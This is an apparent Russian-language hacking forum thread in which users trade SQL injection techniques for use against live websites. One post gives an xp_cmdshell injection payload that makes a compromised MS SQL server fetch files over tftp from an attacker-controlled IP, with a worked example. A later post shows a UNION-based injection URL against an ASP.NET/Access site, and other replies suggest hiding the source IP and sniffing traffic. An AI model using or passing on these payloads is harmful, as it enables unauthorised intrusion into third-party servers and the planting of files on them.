Не вышло чет, мб я что-либо сделал неправильно. Жду советов. Желательно по конкретнее что да как )

Скачивай tftp сервер (http://tftpd32.jounin.net/tftpd32_download.html), запускай на своем компе, указав папку, из которой будут закачиваться файлы на удаленный сервер. Теперь выполняй команду через инъекцию:
;exec master..xp_cmdshell 'tftp -i [твой ip] GET [любой файл из папки] [путь нового файла]'--
например
;exec master..xp_cmdshell 'tftp -i 12.34.56.78 GET blabla.txt C:\blabla.txt'--
Во время закачивания файл на удаленный сервер, можно видеть список активных подключений. Во вкладке Log viewer также можно увидеть адреса всех клиентов.

палевно все-таки к своему айпи конектица...

Да вот в том то и дело, что кроме пинга я ничего не могу делать (видать файр, ито не стандартный).

так можно не к своему =)

SHS, чем win(tcp)dump не нравится? Запускаешь и ловишь пакеты

Просто я никогда их не использовал. Мой любимый сниф- Ettercap. Другие познавать это время, а времени нет.

Там не нужно ничего познавать. Единственный аргумент, который тебе придется использовать это "-i", для указания интерфейса(если он не один).
Пример:
Все

Привет!
Надеюсь пишу в нужную тему. Ситуация: есть самописный движок на ASP .NET, база Access. Пытаюсь сделать SQL inj вида:

_http://url/page.aspx?page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+from+tablename%00

При этом получается ошибка: Exception Details: System.InvalidCastException: Specified cast is not valid. Т.е. как я понимаю где-то в запросе данные преобразуются и проверяются... Можно ли как-то просто вычислить это место?

Табличка и тип базы точно известны, т.к. удалось успешно использовать почти такую же inj в другом проекте на этом движке :-) Но там использовалась уязвимость в части, которой на нужном сайте просто нет. Число параметров подобрано по order by